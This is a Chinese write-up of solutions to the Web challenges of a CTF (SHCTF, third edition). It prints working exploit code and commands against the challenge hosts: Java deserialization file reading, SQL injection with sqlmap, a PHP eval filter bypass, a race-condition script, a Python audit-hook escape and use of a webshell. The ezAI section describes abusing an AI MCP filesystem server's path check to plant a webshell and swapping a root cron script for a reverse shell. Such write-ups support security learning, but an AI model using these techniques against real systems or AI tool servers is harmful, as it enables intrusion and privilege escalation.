SHCTF 第三届 Web 部分题目复盘与思路

攻击思路

Note 对象实现了 Serializable 接口，且未校验 filePath 字段。通过构造恶意序列化的 Note 对象，设置 filePath 为敏感路径，触发任意文件读取。

编译与发送

本地使用 JDK 编译 Exp.java 生成 payload.ser，通过 curl 发送 POST 请求。

// Exp.java
public class Exp {
    public static void main(String[] args) {
        Note note = new Note("Exploit", "Reading Flag", "/flag");
        FileOutputStream fos = new FileOutputStream("payload.ser");
        ObjectOutputStream oos = new ObjectOutputStream(fos);
        oos.writeObject(note);
        oos.close();
    }
}

偷懒方法

直接使用十六进制 Payload 发送，无需编译环境。

echo -ne "\xac\xed\x00\x05..." > payload.bin
curl -X POST http://challenge.shc.tf:31865/upload --data-binary @payload.bin | grep SHCTF

Go：WAF 绕过

攻击思路

Go 语言编写的验证系统，WAF 拦截小写 admin。尝试修改参数大小写即可绕过。

curl "http://challenge.shc.tf:31025/" -d '{"Role":"admin"}'

返回 Flag。

上古遗迹档案馆：SQL 注入

攻击思路

输入 1' 报错，确认 SQL 注入。使用 sqlmap 爆破数据库结构。

sqlmap -u "http://challenge.shc.tf:30879/?id=*" --batch -D archive_db -T secret_vault --dump

kill_king：JS 篡改与 PHP Eval 绕过

攻击思路

前端 JS 控制游戏逻辑，可直接修改变量跳过关卡。后端 check.php 存在 eval 调用，需绕过正则过滤。

PHP 审计

参数 who 和 are 必须是数字，you 必须是非单词字符。利用三元表达式和函数名动态引用绕过。

// 构造 payload
?who=1&are=2&you=(~%8c%86%8c%8b%9a%92)(~%96%9b): 

最终实现命令执行。

ez_race：并发竞争条件

攻击思路

提现接口存在 1 秒延迟，高并发请求可制造余额负数，触发 Flag 输出。

Payload

使用 JavaScript 并发发送多个提现请求。

(async()=>{
    const withdrawUrl = window.location.pathname;
    const amount = 10;
    // ... 并发逻辑 ...
    const requests = Array.from({length:10}, async(v, i)=>{
        await fetch(withdrawUrl, {method:"POST", body: `csrfmiddlewaretoken=${token}&amount=${amount}`});
    });
    await Promise.all(requests);
})();

calc?js?f**k!：JSFuck

攻击思路

白名单仅允许特定符号，利用 JSFuck 技术构建任意代码执行。

Payload

使用 jsf**k.com 生成 Payload，通过 POST /calc 接口提交。

Eazy_Pyrunner：Python 审计钩子绕过

攻击思路

Python 代码执行环境有 WAF 和审计钩子限制。通过劫持内置函数和审计逻辑，绕过检查。

Payload

利用 sys.modules 和 __builtins__ 绕过模块封锁。

g = globals()
bi = vars(g[bytes([95,95,98,117,105,108,116,105,110,115,95,95]).decode()])
# 劫持审计逻辑...
s_mod = g[bytes([115,121,115]).decode()]
po_mod = m_dict.get(bytes([112,111,115,105,120]).decode())
s_func = getattr(po_mod, bytes([115,121,115,116,101,109]).decode())
s_func(bytes([105,100]).decode())

05_em_v_CFK：代码包含与数据库操作

攻击思路

通过隐藏信息找到后门 shell.php，利用 include 机制修改 $my_money 变量，从而购买 Flag。

curl -s http://challenge.shc.tf:30659/uploads/shell.php \
-d "key=114514" \
--data-urlencode "code=include '../connect.php'; \$stmt = \$pdo->prepare('CALL buy_item(?, ?)'); \$stmt->execute([3, 100.00]); print_r(\$stmt->fetch());"

ezAI：MCP 服务文件系统漏洞

攻击思路

基于 Model Context Protocol (MCP) 的 AI 靶机。利用 filesystem 插件的文件读写能力写入 Webshell，并通过计划任务提权。

后渗透阶段

1. 写入 Webshell 到 /var/www/html。
2. 发现 root 定时执行 /usr/lib/php/sessionclean，该文件对 mcp 用户可写。
3. 创建软连接指向该脚本，替换内容为反弹 Shell。
4. 等待定时任务执行，获取 Root 权限读取 /root/flag。

漏洞原因

MCP 服务端路径校验逻辑存在缺陷，允许访问 allowed_directories 前缀下的所有子目录，导致越权访问。

以上为本次 CTF Web 部分的解题记录，希望能对大家有所帮助。